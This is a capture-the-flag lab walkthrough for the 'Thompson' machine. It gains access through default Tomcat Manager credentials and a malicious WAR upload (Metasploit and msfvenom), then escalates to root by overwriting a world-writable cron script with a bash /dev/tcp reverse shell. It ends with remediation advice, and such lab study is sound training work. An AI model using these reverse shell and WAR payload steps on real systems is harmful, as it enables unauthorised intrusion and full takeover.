Target IP: thompson.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
The “Thompson” machine exposes an Apache Tomcat administrative interface on port 8080. We gain initial access by guessing default credentials (tomcat:s3cret) for the Tomcat Manager App and uploading a malicious WAR file via Metasploit to achieve Remote Code Execution (RCE). Privilege escalation is achieved by identifying a system cron job running a script (id.sh) as root. Due to misconfigured write permissions, we overwrite this script with a reverse shell payload to gain root access.
Key TTPs (MITRE ATT&CK):
- T1078 (Valid Accounts): Default Credentials (
tomcat:s3cret). - T1190 (Exploit Public-Facing App): Uploading malicious WAR to Tomcat.
- T1053 (Scheduled Task/Job): Exploiting a Cron Job running as root.
- T1574 (Hijack Execution Flow): Modifying a script executed by a privileged process.
2. Operational Setup
Host Configuration
echo "10.10.x.x thompson.thm" | sudo tee -a /etc/hostsWorkspace
- Pane 1:
msfconsole. - Pane 2:
nc -lvnp 6969(For the Cron job shell). - Pane 3: Notes.
3. Enumeration: “What do we see?”
A. Network Scanning
nmap -sC -sV -p- -oA nmap/thompson thompson.thmResults:
- 22/tcp (SSH): OpenSSH 7.2p2.
- 8009/tcp (AJP13): Apache Jserv.
- 8080/tcp (HTTP): Apache Tomcat 8.5.5.
B. Web Enumeration (Tomcat)
We navigate to http://thompson.thm:8080. It’s the default Tomcat landing page.
We try to access the Manager App at /manager/html.
It prompts for Basic Authentication.
Credential Guessing: Before using Hydra, we try standard defaults manually:
admin:admintomcat:tomcattomcat:s3cret-> Success!
4. Initial Access: WAR File Upload
The Tomcat Manager allows users to upload .war (Web Archive) files. Tomcat automatically unpacks and executes them.
Method: Metasploit (Your approach)
You mentioned using Meterpreter, which automates the WAR generation and upload.
msfconsole
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS thompson.thm
set RPORT 8080
set HttpPassword s3cret
set HttpUsername tomcat
set LHOST tun0
set LPORT 4444
runResult:
Meterpreter session opened as user tomcat.
User Flag: Located at /home/jack/user.txt.
5. Privilege Escalation: Cron Job Hijacking
Enumeration
Once inside, we check for scheduled tasks.
cat /etc/crontabOutput:
* * * * * root cd /home/jack && bash id.shAnalysis:
- User:
rootruns this command. - Frequency: Every minute (
* * * * *). - Action: It goes to
/home/jackand executesid.sh.
The Vulnerability
We check the permissions of this file.
ls -l /home/jack/id.sh
# -rwxrwxrwx 1 jack jack ... id.shCritical Flaw: The file is writable by everyone (or at least writable by the tomcat user if groups overlap, but usually it’s world-writable on this box).
Exploitation
We overwrite the script with the commands you provided. This replaces the legitimate content with a reverse shell.
1. Set up Listener (Pane 2):
nc -lvnp 69692. Inject Payload (On Target):
# We overwrite id.sh completely
echo '#!/bin/bash' > /home/jack/id.sh
echo 'bash -i >& /dev/tcp/10.10.YOUR.IP/6969 0>&1' >> /home/jack/id.sh
chmod +x /home/jack/id.sh3. Wait: Wait up to 60 seconds for the cron daemon to trigger the job.
Result: The listener in Pane 2 catches the shell.
# whoami
rootRoot Flag: /root/root.txt.
6. Alternative Vector (Manual WAR)
If Metasploit is not allowed (e.g., OSCP), here is how you do the Initial Access manually:
- Generate Payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=4444 -f war > shell.war- Upload:
Go to the Tomcat Manager (
/manager/html), scroll down to “WAR file to deploy,” browse toshell.war, and click Deploy. - Trigger:
Click on
/shellin the application list. - Catch:
nc -lvnp 4444.
7. Remediation (Blue Team)
- Change Default Credentials:
- The
tomcat-users.xmlfile containstomcat:s3cret. This must be changed immediately or the user removed.
- Restrict Manager Access:
- The Manager App should not be exposed to the public internet. Restrict access via IP allowlisting in
context.xml.
- File Permissions:
- Scripts executed by root via Cron must be owned by
rootand writable only by root. - Fix:
chown root:root /home/jack/id.shandchmod 700 /home/jack/id.sh.